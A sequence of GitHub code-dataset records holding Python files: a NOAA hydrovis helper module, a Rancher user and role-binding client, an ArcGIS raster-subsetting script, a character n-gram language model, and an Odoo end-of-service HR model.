Wrote cache data into {new_archive_table} and dropped corresponding table from {retention_days} days ago, if it existed.\")\n \n ###########################################\n def check_required_tables_updated(self, sql_path_or_str, sql_replace={}, reference_time=None, stop_on_first_issue=True, raise_if_false=False):\n \"\"\" Determines if tables required by provided SQL path or string are updated as expected\n\n Args:\n sql_path_or_str (str): Path to SQL file or raw SQL string\n sql_replace (dict): Dictionary containing find/replace values for SQL, if applicable\n reference_time (str): The reference_time that should be compared against for tables that contain a\n reference_time column. If the table does not contain that column, it is\n considered to be up to date\n stop_on_first_issue (bool): If True, the first issue encountered will cause the script to terminate\n either returning false or raising an exception if raise_if_false is also True. If False, every\n error will be explored before returning (only useful if raise_if_false is True since the error\n message will thus contain all relevant failures, rather than just the first.)\n raise_if_false (bool): If True, a custom RequiredTableNotUpdated exception will be raised\n if either a table does not exist, or if the reference_time column\n exists its current value does not match the provided reference_time. The specific\n details of the failure will be included in the exception message, which will only\n be the first failure encountered unless stop_on_first_issue is False.\n \n Raises:\n RequiredTableNotUpdated if raise_if_false is True\n \n Returns:\n Bool. True if no issues encountered, False otherwise.\n \"\"\"\n issues_encountered = []\n # Determine if arg is file or raw SQL string\n if os.path.exists(sql_path_or_str):\n sql = open(sql_path_or_str, 'r').read()\n else:\n sql = sql_path_or_str\n \n for word, replacement in sql_replace.items():\n sql = re.sub(word, replacement, sql, flags=re.IGNORECASE).replace('utc', 'UTC')\n \n output_tables = set(re.findall('(?<=INTO )\\w+\\.\\w+', sql, flags=re.IGNORECASE)) \n input_tables = set(re.findall('(?<=FROM |JOIN )\\w+\\.\\w+', sql, flags=re.IGNORECASE))\n check_tables = [t for t in input_tables if t not in output_tables]\n\n if not check_tables:\n return True\n \n # This next 3 lines were added specifically to abort checking cache.max_flows_ana when creating \n # cache.max_flows_ana_past_hour since cache.max_flow_ana will always be an hour behind at the \n # time of creating the past_hour table. Rather than hard-code it exactly, I've left it more generalized \n # in case other similar cases come up. But this could ideally be removed once We figure out a \n # new method for storing the past hour of max_flows_ana.\n if any('past' in t for t in output_tables):\n return True\n\n # Required tables exist and should be checked\n with self.connection as connection:\n cur = connection.cursor()\n for table in check_tables:\n if issues_encountered and stop_on_first_issue:\n break\n schemaname, tablename = table.lower().split('.')\n sql = f'''\n SELECT EXISTS (\n SELECT FROM \n information_schema.tables\n WHERE \n table_schema = '{schemaname}' AND \n table_name = '{tablename}'\n );\n '''\n cur.execute(sql)\n table_exists = cur.fetchone()[0]\n\n if not table_exists:\n issues_encountered.append(f'Table {table} does not exist.')\n continue\n \n # Table exists.\n\n if not reference_time or any(x in table for x in ['past', 'ahps']):\n continue\n \n # Reference time provided.\n \n # Check if reference_time column exists and if its entry matches\n sql = f'''\n SELECT EXISTS (\n SELECT 1 \n FROM information_schema.columns \n WHERE table_schema='{schemaname}' AND table_name='{tablename}' AND column_name='reference_time'\n );\n '''\n cur.execute(sql)\n reftime_col_exists = cur.fetchone()[0]\n if not reftime_col_exists:\n continue\n \n # Column 'reference_time' exists\n \n # Check if it matches\n sql = f\"SELECT reference_time FROM {table} LIMIT 1\"\n cur.execute(sql)\n reftime_result = cur.fetchone()\n if not reftime_result: # table is empty\n issues_encountered.append(f'Table {table} is empty.')\n continue\n \n data_reftime = reftime_result[0].replace(\" UTC\", \"\")\n if data_reftime != reference_time: # table reference time matches current reference time\n issues_encountered.append(f'Table {table} has unexpected reftime. Expected {reference_time} but found {data_reftime}.')\n continue\n \n if issues_encountered:\n if raise_if_false:\n raise RequiredTableNotUpdated(' '.join(issues_encountered))\n return False\n return True\n\n###################################################################################################################################################\n###################################################################################################################################################\nclass s3_file:\n def __init__(self, bucket, key):\n self.bucket = bucket\n self.key = key\n self.uri = 's3://' + bucket + '/' + key\n\n ###################################\n @classmethod\n def from_lambda_event(cls, event):\n print(\"Parsing lambda event to get S3 key and bucket.\")\n if \"Records\" in event:\n message = json.loads(event[\"Records\"][0]['Sns']['Message'])\n data_bucket = message[\"Records\"][0]['s3']['bucket']['name']\n data_key = urllib.parse.unquote_plus(message[\"Records\"][0]['s3']['object']['key'], encoding='utf-8')\n else:\n data_bucket = event['data_bucket']\n data_key = event['data_key']\n return cls(data_bucket, data_key)\n\n ###################################\n @classmethod\n def from_eventbridge(cls, event):\n configuration = event['resources'][0].split(\"/\")[-1]\n eventbridge_time = datetime.datetime.strptime(event['time'], '%Y-%m-%dT%H:%M:%SZ')\n\n coastal = False\n if \"coastal\" in configuration:\n coastal = True\n \n forcing = False\n if \"forcing\" in configuration:\n forcing = True\n\n if \"hawaii\" in configuration:\n domain = \"hawaii\"\n elif \"puertorico\" in configuration:\n domain = \"puertorico\"\n elif \"alaska\" in configuration:\n domain = \"alaska\"\n else:\n domain = \"conus\"\n\n if \"analysis_assim\" in configuration:\n if \"14day\" in configuration:\n reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0, hour=0)\n elif coastal and domain in [\"conus\", \"puertorico\"]:\n reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=1)\n else:\n reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0)\n elif \"short_range\" in configuration:\n if domain in [\"hawaii\", \"puertorico\"]:\n reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=3)\n elif domain == \"alaska\":\n reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=1)\n elif coastal:\n reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=2)\n else:\n reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=1)\n elif \"medium_range\" in configuration:\n if forcing:\n reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=5)\n elif domain == \"alaska\":\n reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=6)\n elif coastal:\n reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=13)\n else:\n reference_time = eventbridge_time.replace(microsecond=0, second=0, minute=0) - datetime.timedelta(hours=7)\n\n bucket = os.environ.get(\"DATA_BUCKET_UPLOAD\") if os.environ.get(\"DATA_BUCKET_UPLOAD\") else \"nomads\"\n\n reference_time = reference_time - datetime.timedelta(hours=1)\n \n return configuration, reference_time, bucket\n\n ###################################\n @classmethod\n def get_most_recent_from_configuration(cls, configuration_name, bucket):\n s3 = boto3.client('s3')\n # Set the S3 prefix based on the confiuration\n def get_s3_prefix(configuration_name, date):\n if configuration_name == 'replace_route':\n prefix = f\"replace_route/{date}/wrf_hydro/\"\n elif configuration_name == 'ahps':\n prefix = f\"max_stage/ahps/{date}/\"\n else:\n nwm_dataflow_version = os.environ.get(\"NWM_DATAFLOW_VERSION\") if os.environ.get(\"NWM_DATAFLOW_VERSION\") else \"prod\"\n if configuration_name == 'medium_range_ensemble':\n configuration_name == 'medium_range_mem6'\n prefix = f\"common/data/model/com/nwm/{nwm_dataflow_version}/nwm.{date}/{configuration_name}/\"\n \n return prefix\n \n # Get all S3 files that match the bucket / prefix\n def list_s3_files(bucket, prefix):\n files = []\n paginator = s3.get_paginator('list_objects_v2')\n for result in paginator.paginate(Bucket=bucket, Prefix=prefix):\n for key in result['Contents']:\n # Skip folders\n if not key['Key'].endswith('/'):\n files.append(key['Key'])\n if len(files) == 0:\n raise Exception(\"No Files Found.\")\n return files\n # Start with looking at files today, but try yesterday if that doesn't work (in case this runs close to midnight)\n today = datetime.datetime.today().strftime('%Y%m%d')\n yesterday = (datetime.datetime.today() - datetime.timedelta(1)).strftime('%Y%m%d')\n try:\n files = list_s3_files(bucket, get_s3_prefix(configuration_name, today))\n except Exception as e:\n print(f\"Failed to get files for today ({e}). Trying again with yesterday's files\")\n files = list_s3_files(bucket, get_s3_prefix(configuration_name, yesterday))\n # It seems this list is always sorted by default, but adding some sorting logic here may be necessary\n file = cls(bucket=bucket, key=files[-1:].pop())\n return file\n\n ###################################\n def check_existence(self):\n s3_resource = boto3.resource('s3')\n try:\n s3_resource.Object(self.bucket, self.key).load()\n return True\n except ClientError as e:\n if e.response['Error']['Code'] == \"404\":\n return False\n else:\n raise\n\n###################################################################################################################################################\n###################################################################################################################################################\ndef get_elasticsearch_logger():\n import logging\n logger = logging.getLogger('elasticsearch')\n logger.setLevel(logging.INFO)\n if not logger.handlers:\n # Prevent logging from propagating to the root logger\n logger.propagate = 0\n console = logging.StreamHandler()\n logger.addHandler(console)\n formatter = logging.Formatter('[ELASTICSEARCH %(levelname)s]: %(asctime)s - %(message)s')\n console.setFormatter(formatter)\n return logger","repo_name":"NOAA-OWP/hydrovis","sub_path":"Core/LAMBDA/layers/viz_lambda_shared_funcs/python/viz_classes.py","file_name":"viz_classes.py","file_ext":"py","file_size_in_byte":21992,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"5939383547","text":"from beedrones.rancher.client import RancherObject, RancherError\nfrom beecell.simple import truncate\n\n\nclass RancherUser(RancherObject):\n \"\"\"RancherUser\n \"\"\"\n def __init__(self, manager):\n super().__init__(manager)\n\n self.global_role_bind = RancherUserGlobalRoleBinding(manager)\n self.cluster_role_bind = RancherUserClusterRoleBinding(manager)\n self.project_role_bind = RancherUserProjectRoleBinding(manager)\n\n def list(self, **filters):\n \"\"\"List users\n\n :param filters: custom filters\n :return: list of users\n \"\"\"\n # filters['limit'] = filters.get('limit', 0)\n res = self.http_list('/users', **filters)\n self.logger.debug('list users: %s' % truncate(res))\n return res\n\n def get(self, user_id):\n \"\"\"Get user info\n\n :param user_id: user id\n :return: user info\n \"\"\"\n res = self.http_get('/users/%s' % user_id)\n self.logger.debug('get user: %s' % truncate(res))\n return res\n\n def add(self, name, pwd, enabled=True, change_pwd=False, **kwargs):\n \"\"\"Create user\n\n :param name: user name\n :param pwd: user password\n :param enabled: user enabled [default=True]\n :param change_pwd: user change_pwd [default=False]\n :param kwargs: custom user params\n :param kwargs.description: user params\n :return: user id\n \"\"\"\n data = {\n 'type': 'user',\n 'enabled': enabled,\n 'mustChangePassword': change_pwd,\n 'name': name,\n 'username': name,\n 'password': pwd\n }\n data.update(self.format_request_data(kwargs, []))\n res = self.http_post('/users', **data)\n self.logger.debug('add user: %s' % res.get('id'))\n return res\n\n def delete(self, user_id):\n \"\"\"Delete user\n\n :param user_id: user id\n :return: True\n \"\"\"\n self.http_delete('/users/%s' % user_id)\n self.logger.debug('delete user: %s' % user_id)\n return True\n\n def generate_kubeconfig(self, user_id, cluster_id):\n \"\"\"generate user kubeconfig\n\n :param cluster_id: cluster id\n :param user_id: user id\n :return: True\n \"\"\"\n self.base_uri = '/v3/clusters/%s?action=generateKubeconfig' % cluster_id\n res = self.http_post('').get('config', '')\n self.logger.debug('generate user %s kubeconfig for cluster %s: %s' % (user_id, cluster_id, res))\n return res\n\n def get_roles(self, user_id):\n \"\"\"get user roles\n\n :param user_id: user id\n :return: user roles\n \"\"\"\n roles = []\n\n # global role bindings\n role_bindings = self.global_role_bind.list(user_id=user_id)\n for rb in role_bindings:\n role = self.manager.role_global.get(rb.get('globalRoleName'))\n role['role_bind_id'] = rb['id']\n roles.append(role)\n\n # cluster role bindings\n role_bindings = self.cluster_role_bind.list(user_id=user_id)\n for rb in role_bindings:\n role = self.manager.role_template.get(rb.get('roleTemplateName'))\n role['role_bind_id'] = rb['id']\n role['context:entity'] = rb.get('clusterName', None)\n roles.append(role)\n\n # project role bindings\n role_bindings = self.project_role_bind.list(user_id=user_id)\n for rb in role_bindings:\n role = self.manager.role_template.get(rb.get('roleTemplateName'))\n role['context:entity'] = rb.get('projectName', None)\n roles.append(role)\n return roles\n\n def get_role_binds(self, role_type='global'):\n \"\"\"get user role binds\n\n :param role_type: role type. Can be global, cluster, project or all\n :return: user roles\n \"\"\"\n res = []\n\n if role_type == 'all' or role_type == 'global':\n # global role bindings\n role_bindings = self.global_role_bind.list()\n for rb in role_bindings:\n rb['role'] = self.manager.role_global.get(rb.get('globalRoleName'))\n res.extend(role_bindings)\n\n if role_type == 'all' or role_type == 'cluster':\n # cluster role bindings\n role_bindings = self.cluster_role_bind.list()\n for rb in role_bindings:\n rb['role'] = self.manager.role_template.get(rb.get('roleTemplateName'))\n res.extend(role_bindings)\n\n if role_type == 'all' or role_type == 'project':\n # project role bindings\n role_bindings = self.project_role_bind.list()\n for rb in role_bindings:\n rb['role'] = self.manager.role_template.get(rb.get('roleTemplateName'))\n res.extend(role_bindings)\n\n self.logger.debug('get users role bindings: %s' % truncate(res))\n return res\n\n def get_role_bind(self, user_id, role_id, role_type='global', cluster_id=None):\n \"\"\"get user role bind\n\n :param user_id: user id\n :param role_id: role id\n :param role_type: role type. Can be global, cluster, project\n :return: user roles\n \"\"\"\n res = None\n\n if role_type == 'global':\n # global role bindings\n role_bindings = [rb['id'] for rb in self.global_role_bind.list()\n if rb.get('globalRoleName') == role_id and\n rb.get('userName') == user_id]\n if 0 < len(role_bindings) < 2:\n res = role_bindings[0]\n\n elif role_type == 'cluster':\n # cluster role bindings\n role_bindings = [rb['id'] for rb in self.cluster_role_bind.list()\n if rb.get('roleTemplateName') == role_id and\n rb.get('userName') == user_id and\n rb.get('clusterName') == cluster_id]\n if 0 < len(role_bindings) < 2:\n res = role_bindings[0]\n\n elif role_type == 'project':\n # project role bindings\n role_bindings = self.project_role_bind.list()\n for rb in role_bindings:\n rb['role'] = self.manager.role_template.get(rb.get('roleTemplateName'))\n res.extend(role_bindings)\n self.logger.debug('get user %s role %s binding: %s' % (user_id, role_id, truncate(res)))\n return res\n\n\nclass RancherUserGlobalRoleBinding(RancherObject):\n \"\"\"RancherUserGlobalRoleBinding\n \"\"\"\n def __init__(self, manager):\n super().__init__(manager)\n self.base_uri = '/v1/management.cattle.io.globalrolebindings'\n\n def list(self, user_id=None, **kwargs):\n \"\"\"Get global role bindings by user\n\n :param user_id: user id\n :return:\n \"\"\"\n # params = ['user_id']\n # data = self.format_paginated_query(kwargs, params, aliases={'user_name': 'userName'})\n data = ''\n res = self.http_get('?').get('data')\n if user_id is not None:\n res = [r for r in res if r.get('userName') == user_id]\n self.logger.debug('get global role binding: %s' % (truncate(res)))\n return res\n\n def add(self, user_id, role):\n \"\"\"assign global role to user\n\n :param user_id: user id\n :param role: global role id\n :return:\n \"\"\"\n data = {\n 'type': 'globalRoleBinding',\n 'globalRoleId': role,\n 'userId': user_id\n }\n self.base_uri = '/v3/globalrolebindings'\n res = self.http_post('', **data)\n self.logger.debug('assign global role %s to user %s' % (role, user_id))\n return res\n\n def delete(self, role_id):\n \"\"\"deassign a global role binding\n\n :param role_id: role id\n :return:\n \"\"\"\n self.base_uri = '/v3/globalrolebindings'\n res = self.http_delete('/%s' % role_id)\n self.logger.debug('deassign global role %s' % role_id)\n return res\n\n\nclass RancherUserClusterRoleBinding(RancherObject):\n \"\"\"RancherUserClusterRoleBinding\n \"\"\"\n def __init__(self, manager):\n super().__init__(manager)\n self.base_uri = '/v1/management.cattle.io.clusterroletemplatebindings'\n\n def list(self, user_id=None, **kwargs):\n \"\"\"Get cluster role bindings by user\n\n :param user_id: user id\n :return:\n \"\"\"\n res = self.http_get('?').get('data')\n if user_id is not None:\n res = [r for r in res if r.get('userName') == user_id]\n self.logger.debug('get user %s cluster role binding: %s' % (user_id, truncate(res)))\n return res\n\n def add(self, user_id, role_id, cluster_id, user_type='local'):\n \"\"\"assign cluster role to user\n\n :param user_id: user id\n :param role_id: cluster role id\n :param user_type: user type [default=local]\n :return:\n \"\"\"\n data = {\n 'type': 'clusterRoleTemplateBinding',\n 'clusterId': cluster_id,\n 'roleTemplateId': role_id,\n 'userPrincipalId': '%s://%s' % (user_type, user_id)\n }\n self.base_uri = '/v3/clusterroletemplatebindings'\n res = self.http_post('', **data)\n self.logger.debug('assign cluster %s role %s to user %s' % (cluster_id, role_id, user_id))\n return res\n\n def delete(self, role_id):\n \"\"\"deassign a cluster role binding\n\n :param role_id: role id\n :return:\n \"\"\"\n role_id = role_id.replace('/', ':')\n self.base_uri = '/v3/clusterroletemplatebindings'\n res = self.http_delete('/%s' % role_id)\n self.logger.debug('deassign cluster role %s' % role_id)\n return res\n\n\nclass RancherUserProjectRoleBinding(RancherObject):\n \"\"\"RancherUserProjectRoleBinding\n \"\"\"\n def __init__(self, manager):\n super().__init__(manager)\n self.base_uri = '/v1/management.cattle.io.projectroletemplatebindings'\n\n def list(self, user_id=None, **kwargs):\n \"\"\"Get cluster role bindings by user\n\n :param user_id: user id\n :return:\n \"\"\"\n res = self.http_get('?').get('data')\n if user_id is not None:\n res = [r for r in res if r.get('userName') == user_id]\n self.logger.debug('get user %s project role binding: %s' % (user_id, truncate(res)))\n return res\n\n def add(self, user_id, role_id, project_id, user_type='local'):\n \"\"\"assign project role to user\n\n :param user_id: user id\n :param role_id: project role id\n :param user_type: user type [default=local]\n :return:\n \"\"\"\n data = {\n 'type': 'projectRoleTemplateBinding',\n 'projectId': project_id,\n 'roleTemplateId': role_id,\n 'userPrincipalId': '%s://%s' % (user_type, user_id)\n }\n self.base_uri = '/v3/projectroletemplatebindings'\n res = self.http_post('', **data)\n self.logger.debug('assign project %s role %s to user %s' % (project_id, role_id, user_id))\n return res\n\n def delete(self, role_id):\n \"\"\"deassign a project role binding\n\n :param role_id: role id\n :return:\n \"\"\"\n role_id = role_id.replace('/', ':')\n self.base_uri = '/v3/projectroletemplatebindings'\n res = self.http_delete('/%s' % role_id)\n self.logger.debug('deassign project role %s' % role_id)\n return res\n","repo_name":"Nivola/beedrones","sub_path":"beedrones/rancher/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":11411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18210493643","text":"from arcpy.management import Clip as ClipRaster\n\n\ndef subset_image(in_raster, area, out_raster):\n from arcpy import Describe\n from math import sqrt\n desc = Describe(in_raster)\n XMin = desc.extent.XMin\n YMin = desc.extent.YMin\n len = sqrt(area)\n clipping_extent = '{0} {1} {2} {3}'.format(XMin, YMin, XMin+len, YMin+len)\n ClipRaster(in_raster, clipping_extent, out_raster, \"#\", \"#\", \"NONE\")\n\n\ndef image_extent_2(in_polygon):\n from arcpy import Describe\n desc = Describe(in_polygon)\n return '{0} {1} {2} {3}'.format(desc.extent.XMin, desc.extent.YMin, desc.extent.XMax, desc.extent.YMax)\n\n\ndef subset_image_for_texture(in_image, in_polygon, area, out_raster):\n from os import path\n from arcpy import Describe, AddWarning\n from arcpy.management import Delete\n from math import sqrt\n temp_rast = path.join(\"in_memory\", \"temp_rast\")\n ClipRaster(in_image, image_extent_2(in_polygon), temp_rast, \"#\", \"#\", \"NONE\")\n desc = Describe(temp_rast).children[0]\n height = desc.height\n width = desc.width\n cell_height = desc.meancell_height\n cell_width = desc.meancell_width\n r_length = height*cell_height\n r_width = width*cell_width\n if r_length > sqrt(area) and r_width > sqrt(area):\n subset_image(temp_rast, area, out_raster)\n else:\n AddWarning(\"Geometry Length and Width do not fit Area| Length = {0} | Width = {1}\".format(r_length, r_width))\n AddWarning(\"Draw a larger area where length and width fit within the area as a square\")\n Delete(temp_rast)\n\n\ndef main():\n from arcpy import CheckExtension, CheckOutExtension, CheckInExtension, ExecuteError, GetMessages\n\n class LicenseError(Exception):\n pass\n\n try:\n if CheckExtension(\"ImageAnalyst\") == \"Available\":\n CheckOutExtension(\"ImageAnalyst\")\n else:\n # raise a custom exception\n raise LicenseError\n subset_image_for_texture(in_image, in_polygon, area, out_image)\n CheckInExtension(\"ImageAnalyst\")\n except LicenseError:\n print(\"Image Analyst license is unavailable\")\n except ExecuteError:\n print(GetMessages(2))\n\n\nif __name__ == \"__main__\":\n debug = False\n if debug:\n in_image = r'C:\\Users\\geof7015\\Documents\\ArcGIS\\Projects\\ArcGIS_Image_Designer\\TestData\\imgFolder\\Ortho.jpg'\n in_polygon = r'C:\\Users\\geof7015\\Documents\\ArcGIS\\Projects\\ArcGIS_Image_Designer\\ArcGIS_Image_Designer.gdb\\subset_polygon'\n area = 400\n out_image = r'C:\\Users\\geof7015\\Documents\\ArcGIS\\Projects\\ArcGIS_Image_Designer\\Textures\\Unprocessed\\test.jpg'\n else:\n from arcpy import GetParameterAsText, GetParameter\n in_image = GetParameterAsText(0)\n in_polygon = GetParameterAsText(1)\n area = GetParameter(2)\n out_image = GetParameterAsText(3)\n main()\n","repo_name":"geoffhtaylor3d/ArcGIS_Image_Designer","sub_path":"Scripts/subset_image_for_texture.py","file_name":"subset_image_for_texture.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17334559630","text":"import itertools\nimport string\nfrom urllib.request import urlopen\nfrom math import log2\n\nclass CorpusReader:\n \"\"\"\n Read an online corpus.\n \"\"\"\n\n VALID = {*string.ascii_lowercase, \".\", \",\", \":\", \"\\n\", \"#\", \"(\", \")\", \"!\", \"?\", \"\\'\", \"\\\"\", \" \"}\n\n @classmethod\n def sanitize(cls, message: str):\n \"\"\"\n Clean up undesired characters.\n \"\"\"\n res = []\n for char in message:\n if char in cls.VALID: # append valid char\n res.append(char)\n elif char in string.ascii_uppercase: # lowercase valid uppercase\n res.append(char.lower())\n\n return \"\".join(res).lower() # return string\n\n def __init__(self, url) -> None:\n \"\"\"\n Read the corpus.\n \"\"\"\n with urlopen(url) as result: # open a remote resource\n res = str(result.read())\n\n self.corpus = self.sanitize(res) # clean up result\n\n self.unigram_count = {char: 0 for char in self.VALID}\n\n for char in self.corpus: # count unigrams\n self.unigram_count[char] = self.unigram_count[char] + 1\n\n self.bigram_count = {bigram: 0 for bigram in itertools.product(self.VALID, repeat=2)}\n\n for pair in itertools.pairwise(self.corpus):\n self.bigram_count[pair] += 1 # count bigrams\n\nclass LanguageModel:\n def __init__(self, corpus: CorpusReader) -> None:\n self.corpus = corpus\n\n # compute n-gram frequencies\n self.unigrams = {key: (count + 1) / (len(self.corpus.corpus) + len(self.corpus.VALID)) for key, count in self.corpus.unigram_count.items()}\n self.bigrams = {(w1, w2): (self.corpus.bigram_count[(w2, w1)] + 1) / (self.corpus.unigram_count[w2] + len(self.corpus.VALID)) for (w1, w2) in self.corpus.bigram_count.keys()}\n \n # log2 frequencies\n self.log2unigrams = {w: log2(val) for w, val in self.unigrams.items()}\n self.log2bigrams = {(w1, w2): log2(val) for (w1, w2), val in self.bigrams.items()}","repo_name":"orchuk/SimAnnDecoder","sub_path":"language_model.py","file_name":"language_model.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24547506872","text":"# -*- coding: utf-8 -*-\nfrom dateutil.relativedelta import relativedelta\nfrom odoo import models, fields, api\n\n\nclass EndOfService(models.Model):\n _name = 'end_of.service'\n _inherit = ['mail.thread', 'mail.activity.mixin']\n _rec_name = 'employee_id'\n\n date = fields.Date(string=\"Date\",\n required=False,\n default=fields.Date.context_today)\n employee_id = fields.Many2one(comodel_name=\"hr.employee\", string=\"Employee Name\", required=False, )\n job_position_id = fields.Many2one(comodel_name=\"hr.job\", string=\"Job Position\", required=False, )\n employee_number = fields.Char(string=\"Employee Number\", required=False, )\n start_training_date = fields.Date(string=\"Start Training Date\", required=False)\n end_training_date = fields.Date(string=\"End Training Date\", required=False)\n training_period = fields.Char(string=\"Training Period\", required=False,\n compute='get_training_period', default='')\n working_years = fields.Char(string=\"Working Years\", required=False,\n compute='get_working_years', store=True)\n date_of_hiring_date = fields.Date(string=\"Date of Hiring\", required=False)\n end_of_service_date = fields.Date(string=\"Date End of Service\", required=False)\n basic_salary = fields.Float(string=\"Basic Salary\", required=False, )\n comprehensive_wage = fields.Float(string=\"Wage\", required=False, )\n\n reason = fields.Many2one(comodel_name=\"reasons.end_of.service\", string=\"Reason\", required=False, )\n\n financial_dues_ids = fields.One2many(comodel_name=\"financial.dues\",\n inverse_name=\"end_of_service_id\", string=\"\", required=False, )\n\n pay_for_working_days = fields.Float(string=\"Pay For Working Days\", required=False, )\n month_of_warning = fields.Float(string=\"Month of Warning\", required=False, )\n leave_entitlement = fields.Float(string=\"Leave Entitlement\", required=False, )\n leave_transportation_allowance = fields.Float(string=\"Leave Transportation Allowance\", required=False, )\n end_of_service_gratuity = fields.Float(string=\"End of Service Gratuity\", required=False, )\n extra_pay = fields.Float(string=\"Extra Pay\", required=False, )\n grants_and_incentives = fields.Float(string=\"Grants & Incentives\", required=False, )\n other = fields.Float(string=\"Other\", required=False, )\n compensation = fields.Float(string=\"Compensation(Basic * 6 months)\", required=False, )\n\n month_of_warning_deduction = fields.Float(string=\"Month Of Warning\", required=False, )\n absence_deduction = fields.Float(string=\"Absence\", required=False, )\n loan_deduction = fields.Float(string=\"Loans\", required=False, )\n work_days_paid_with_salary_deduction = fields.Float(string=\"Work days paid with salary\", required=False, )\n violations_and_fines_deduction = fields.Float(string=\"Violations and fines\", required=False, )\n grants_and_incentives_deduction = fields.Float(string=\"Grants and incentives\", required=False, )\n total_deduction = fields.Float(string=\"Total Deduction\", required=False,compute='sum_total_deduction' )\n\n # Check Invisible\n pay_for_working_days_boolean = fields.Boolean(string=\"Pay For Working Days\", required=False\n , related='reason.pay_for_working_days')\n month_of_warning_boolean = fields.Boolean(string=\"Month of Warning\", required=False,\n related='reason.month_of_warning')\n leave_entitlement_boolean = fields.Boolean(string=\"Leave Entitlement\", required=False,\n related='reason.leave_entitlement')\n leave_transportation_allowance_boolean = fields.Boolean(string=\"Leave Transportation Allowance\",\n related='reason.leave_transportation_allowance',\n required=False, )\n end_of_service_gratuity_boolean = fields.Boolean(string=\"End of Service Gratuity\",\n related='reason.end_of_service_gratuity',\n required=False, )\n extra_pay_boolean = fields.Boolean(string=\"Extra Pay\", required=False,\n related='reason.extra_pay')\n grants_and_incentives_boolean = fields.Boolean(string=\"Grants & Incentives\",\n related='reason.grants_and_incentives',\n required=False, )\n other_boolean = fields.Boolean(string=\"Other\", required=False,\n related='reason.other')\n compensation_boolean = fields.Boolean(string=\"compensation(Basic * 6 months)\", required=False,\n related='reason.compensation'\n )\n\n total_benefits = fields.Float(string=\"Total Benefits\", required=False, readonly=True)\n state = fields.Selection([\n ('draft', 'Draft'),\n ('hr_approve', 'HR Officer Approve'),\n ('hr_manager','HR Manager Approve'),\n ('secretary','Secretary Genral'),\n ('cancel', 'Cancel'),\n ('finance', 'Finance')], string='Status', index=True, readonly=True, default='draft',\n track_visibility='onchange', copy=False)\n finance_approve_id=fields.Many2one('payment.request',readonly=True)\n paid_amount=fields.Float(string='Net Paid Amount',compute='net_amount',store=True)\n donor = fields.Many2one('res.partner', string='Donor', required=True)\n project = fields.Many2one('account.analytic.account', string='Project', domain=\"[('type','=','project')]\")\n account = fields.Many2one('account.account', string='Account',required=True)\n activity = fields.Many2one('account.analytic.account', 'Activity',\n domain=\"[('type','=','activity')]\")\n\n @api.depends('total_benefits', 'total_deduction')\n def sum_total_deduction(self):\n for rec in self:\n rec.total_deduction=rec.month_of_warning+rec.loan_deduction+rec.violations_and_fines_deduction+rec.absence_deduction +\\\n rec.work_days_paid_with_salary_deduction + rec.grants_and_incentives_deduction\n\n @api.depends('total_benefits','total_deduction')\n def net_amount(self):\n for rec in self:\n rec.paid_amount=rec.total_benefits - rec.total_deduction\n\n def to_hr(self):\n self.write({'state': 'hr_approve'})\n\n def to_hr_manager(self):\n self.write({'state': 'hr_manager'})\n\n def to_secretary(self):\n self.write({'state': 'secretary'})\n\n def action_cancel(self):\n self.write({'state': 'cancel'})\n\n def action_done(self):\n self.write({'state': 'finance'})\n payment_request_vals = {\n 'payment_method': 'cash',\n 'user_id': self.env.user.partner_id.id,\n 'reason': self.reason\n }\n finance_approve_id = self.env['payment.request'].create(payment_request_vals)\n payment_request_lines_vals = {\n 'payment_request_id':finance_approve_id.id,\n 'account_id': self.account.id,\n 'donor_id': self.donor.id,\n 'project_id': self.project.id,\n 'analytic_activity_id': self.activity.id,\n 'request_amount':self.paid_amount,\n\n }\n self.env['payment.request.lines'].create(payment_request_lines_vals)\n self.finance_approve_id = finance_approve_id\n\n @api.onchange('employee_id')\n def get_employee_data(self):\n for rec in self:\n rec.job_position_id = rec.employee_id.job_id.id\n rec.comprehensive_wage = rec.employee_id.contract_id.wage\n # rec.basic_salary = rec.employee_id.pin\n rec.basic_salary = rec.comprehensive_wage * 60 / 100\n\n @api.depends('start_training_date', 'end_training_date')\n def get_training_period(self):\n for rec in self:\n if rec.start_training_date or rec.end_training_date:\n days = relativedelta(rec.end_training_date, rec.start_training_date).days\n months = relativedelta(rec.end_training_date, rec.start_training_date).months\n years = relativedelta(rec.end_training_date, rec.start_training_date).years\n rec.training_period = \" Years: \" + str(years) + \" Months : \" + str(months) + \" Days : \" + str(days)\n else:\n rec.training_period = \"\"\n\n @api.depends('employee_id', 'end_of_service_date')\n def get_working_years(self):\n for rec in self:\n if rec.employee_id:\n\n # contract = self.env['hr.contract'].search([\n # ('employee_id', '=', rec.employee_id.id),\n # ('state', '=', 'open')\n # ])\n\n rec.date_of_hiring_date = rec.employee_id.contract_id.date_start\n if rec.employee_id.contract_id.date_end:\n rec.end_of_service_date = rec.employee_id.contract_id.date_end\n res = self.env['indemnity.config.line'].search([])\n days = relativedelta(rec.end_of_service_date, rec.date_of_hiring_date).days\n months = relativedelta(rec.end_of_service_date, rec.date_of_hiring_date).months\n years = relativedelta(rec.end_of_service_date, rec.date_of_hiring_date).years\n\n rec.working_years = \" Years: \" + str(years) + \" Months : \" + str(months) + \" Days : \" + str(days)\n else:\n rec.working_years = ''\n\n # print('------------res', res)\n # print('------------days', days)\n # for line in res:\n\n # 